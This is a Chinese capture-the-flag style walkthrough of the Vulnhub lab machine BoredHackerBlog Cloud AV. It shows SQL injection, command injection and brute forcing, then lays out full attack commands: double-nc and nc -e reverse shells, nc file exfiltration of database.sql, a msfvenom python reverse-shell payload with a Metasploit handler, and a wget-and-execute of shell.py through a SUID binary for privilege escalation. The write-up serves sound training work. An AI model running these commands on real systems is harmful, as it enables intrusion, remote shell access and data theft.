IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> Vulnhub靶机:BOREDHACKERBLOG_ CLOUD AV -> 正文阅读

[网络协议]Vulnhub靶机:BOREDHACKERBLOG_ CLOUD AV

介绍

系列:BoredHackerBlog(此系列共4台)
发布日期:2020年03月29日
难度:初级-中级
靶机地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/
学习:

  • 端口扫描
  • WEB侦查
  • SQL注入
  • 命令注入
  • 密码爆破
  • 代码审计
  • NC串联
  • 本地提权

信息收集

主机发现

netdiscover主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。

sudo netdiscover -i eth0 -r 192.168.56.0/24

有点懵逼,怎么扫描出两个?通过对端口扫描知道 192.168.56.102 是我们的目标,那么192.168.56.100是什么鬼
在这里插入图片描述

由于我kali是host-only网卡和nat网卡,靶机是host-only,而host-only是默认是开启dhcp的,测试一下,192.168.56.100 果然是dhcp服务器,只不过这个地址不是dhcp服务器的常见地址。
在这里插入图片描述

端口扫描+开放端口探测

端口探测:nmap -A -p22,8080 192.168.56.102,看到8080端口运行着一个基于python的web服务。并且linux的内核版本比较旧,提权应该很简单。
在这里插入图片描述

网站探测

访问网站,让我输入个验证码,鬼知道是什么,字典爆破试试。
在这里插入图片描述

特殊字符爆破

这里可以先试着用键盘上的特殊字符,看能不能引起靶机的异常
在这里插入图片描述

然后,看到了sql报错
在这里插入图片描述

换到浏览器中可以看到高清大图
在这里插入图片描述

观察下sql语句,这是可以登录认证绕过的
在这里插入图片描述

在这里插入图片描述

纯字典爆破

直接找个字典去爆破,很轻松找到了验证码
在这里插入图片描述

兴冲冲的去登录,发现登不上去,原来是靶机被一波扫死了
在这里插入图片描述

重启靶机后,输入邀请码登录网站,他让尝试扫描一些文件,那就拿当前目录下的bash试试吧,如下图
在这里插入图片描述

在这里插入图片描述

命令执行

感觉这个套路似曾相识,dvwa的命令执行不就是这个样子的嘛,试一下(需要耐心等待一会)
在这里插入图片描述

在这里插入图片描述

Getshell

方式1:python反弹shell

记得在靶场 CHRONOS: 1 中也是有个框框,也是一个基于python的web服务,命令执行不了的话,反弹shell呢? 使用专业网站:https://forum.ywhack.com/shell.php
即便是python,里面也是存在多种命令,测试发现第一个就可以用(反弹比较慢,需要耐心点)
在这里插入图片描述

好不容易拿到shell后,却发现每执行一次命令都要等上半天,这谁遭得住啊,果断放弃。

方式2:nc反弹shell

确认到目标系统上是存在nc的
在这里插入图片描述

在这里插入图片描述

使用命令:hello |nc 192.168.56.103 1234获取到shell,但是,什么都做不了,解决办法,指明反弹的shell终端。
在这里插入图片描述


使用命令:hello | nc -e /bin/sh 192.168.56.103 1234,结果是拿不到shell,只能说靶机的nc不支持功能-e,没关系,可以通过二次重定向解决掉。
在这里插入图片描述


使用命令:hello |nc 192.168.56.103 1234|/bin/sh|nc 192.168.56.103 4567
kali开启两个nc监听,命令执行效果终于能实时回显了。
在这里插入图片描述

文件传输

注意到靶机上存在一个名为database.sql的文件,想看看有没有什么敏感信息。可以通过nc来传输,使用方法参见之前的文章:https://www.yuque.com/u1881995/ytuylg/zt36az#mVujH

nc -nvlp 333 > 1.sql		// 接收端
nc -nv 192.168.56.103 333 < database.sql -q 1		// 发送端

在这里插入图片描述

打开文件,发现了一些密码
在这里插入图片描述

按照靶机的一贯尿性,这个时候就是要开始爆破SSH了。

爆破SSH

  1. 拿到可以SSH登录的用户名

其实之前查看home目录的时候已经知道了存在两个用户,只不过查看passwd的方式获取的更全面些
在这里插入图片描述

  1. 生成字典并爆破

结果被靶机忽悠了,爆破不了。
在这里插入图片描述

提权:suid提权

一番搜搜找找,发现当前用户的家目录的里面有个编译好的,并且具有suid权限的文件。
在这里插入图片描述

查看一下文件内容,有一句话很显眼,告知我们要加参数才能运行这个程序,但是有没告诉我们参数怎么加。那是不是想怎么加就怎么加呢?
在这里插入图片描述

输入-a参数没反应,输入aaa参数有反应
在这里插入图片描述

方式1:双重nc反弹shell

那就,继续双重nc反弹那shell吧

./update_cloudav "aaa |nc 192.168.56.103 4444|/bin/sh|nc 192.168.56.103 5555"	// 执行命令

在这里插入图片描述

方式2:python+MSF反弹shell

这个是老外的做法,老外的文章地址放在了“参考”中。
老外并没有直接网上直接找一段python用来实现反弹shell的命令,而是用MSF来生成。
攻击者准备:

// 生成能反弹shell的python文件
msfvenom -p cmd/unix/reverse_python lhost=192.168.56.103 lport=4545 -f raw > shell.py

// 开启web服务,方便靶机拿到文件
python3 -m http.server 80

// 开启msf
msfconsole
use exploit/multi/handler
set payload cmd/unix/reverse_python
set lhost 192.168.56.103
set lport 4545
run

// 获取交互式shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

靶机下载文件并运行:

cd ~
wget http://192.168.56.103/shell.py
chmod +x shell.py
./update_cloudav 'aaa|./shell.py'

提权成功
在这里插入图片描述

参考

BoredHackerBlog: Cloud AV Walkthrough

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-06-25 18:24:32  更:2022-06-25 18:25:30 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/25 23:27:43-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码